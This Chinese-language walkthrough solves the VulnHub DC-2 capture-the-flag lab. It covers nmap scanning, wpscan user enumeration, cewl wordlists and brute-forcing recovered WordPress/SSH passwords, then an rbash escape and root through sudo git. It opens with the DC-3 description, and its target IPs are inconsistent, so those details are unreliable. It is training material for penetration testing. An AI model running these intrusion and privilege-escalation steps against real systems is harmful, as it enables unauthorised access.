一、环境搭建:
1、靶场描述
DC-3是另一个专门建立的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAu7上推我让你重新开始。但请注意:我不会给你答案,相反,我会给你一个如何前进的想法。对于那些有CTF和Boot2Root挑战经验的人来说,这可能不会花你很长时间(事实上,它可能只需要不到20分钟)。如果是这种情况,如果你想让它更具挑战性,你可以重做挑战,探索其他获得根和获得旗帜的方法。
只有一个flag
2,下载靶场环境
靶场下载地址:
https://www.vulnhub.com/entry/dc-32,312/
二、渗透靶场
1,目标:
目标就是我们搭建的靶场,靶场IP为:192.168.66.0/24
2、信息收集:寻找靶机真实IP
nmap -sP+自己IP 192.168.131.130
3,信息收集:探端口及服务
nmap -A -p- -v 192.168.131.130
发现开放了80端口,存在web服务,Apache/2.4.10,
之后看到开放了7744端口,开放了ssh服务,OpenSSH 6.7p1
4,接着开始访问web
http://192.168.131.130
看到了,访问不到且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。
修改hosts文件,添加靶机IP到域名dc-2的指向
输入vim /etc/hosts
添加完成之后,再次访问就会访问成功。
5,可以很明显的发现这是一个wordpress的站点
可以看到flag,点击进去出现英文字母翻译出来大致意思就是“暴力破解,账号密码”
6,做一个目录扫描dirb http://dc-2/
疑似发现后台(http://dc-2/wp-admin/user/)打开链接
打开后进入登录页面
发现多个,但是没有什么用的东西
7, 用户名枚举
前面我们提到这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描
Wpscan一些常用语句:
wpscan --url http://dc-2
wpscan --url http://dc-2 --enumerate t 扫描主题
wpscan --url http://dc-2 --enumerate p 扫描插件
wpscan --url http://dc-2 --enumerate u 枚举用户
扫描wordpress版本
wpscan --url http://dc-2(来扫描)
发现了wordpress的版本4.7.10
8,登录页面尝试登录
随即输入用户名密码,提示用户名不存在,似乎可以进行用户名枚举,首先来个用户枚举,再尝试利用枚举到的用户爆破密码
wpscan --url http://dc-2 --enumerate u
列举出三个用户名(admin,jerry,tom)
9,暴力破解出账号密码
根据flag1可以用暴力破解,我们使用cewl生成字典,
Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。
为了方便大家记录,或者为将来的研究提供参考,Cewl可以将打印出的字典存储为文件。这里可以使用-w参数来将密码字典存储为text文件:
cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt
使用wpscan进行暴力破解
wpscan --url http://dc-2 --passwords dc2.txt
10,爆破出来两个账号
jerry/adipiscing
tom/parturient(登录后,在登录tom在tom的家目录发现flag3)
jerry/adipiscing,tom/parturient
登录ssh
ssh tom@192.168.66.141 -p 7744
在tom账号的家目录发现flag3
cat用不了
11,接下来,尝试rbash绕过详情参考:https://xz.aliyun.com/t/7642
查看可以使用的命令:echo $PATH
cd进不去目录,使用sl直接查看目录
使用echo来绕过rbash
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*
在jerry的家目录发现flag4信息翻译过来
Good to see that you've made it this far - but you " re not home yet .
很高兴看到你走了这么远,但你还没回家。
You still need to get the final flag (the only flag that really counts!!! ).
您仍然需要获得最后的标志(唯一真正重要的标志!)
No hints here 一you're on your own now. :- )
这里没有暗示,一,你现在只能靠自己了。*-)
Go on
继续
git outta here!!!!
大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权
使用tom用户无权限运行sudo 我们切换到jerry用户
我们可以看到无需root权限,jerry 可以使用 git
sudo -l
12,提权
查看一下可以使用的root权限命令
find / -user root -perm -4000 -print 2>/dev/null
jerry用户也不可以直接sudo su
13, 使用git命令进行提取sudo git help status,提取后whoami,出现root
cd /root后ls查看
cat final-flag.txt 
扫一扫
1405
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
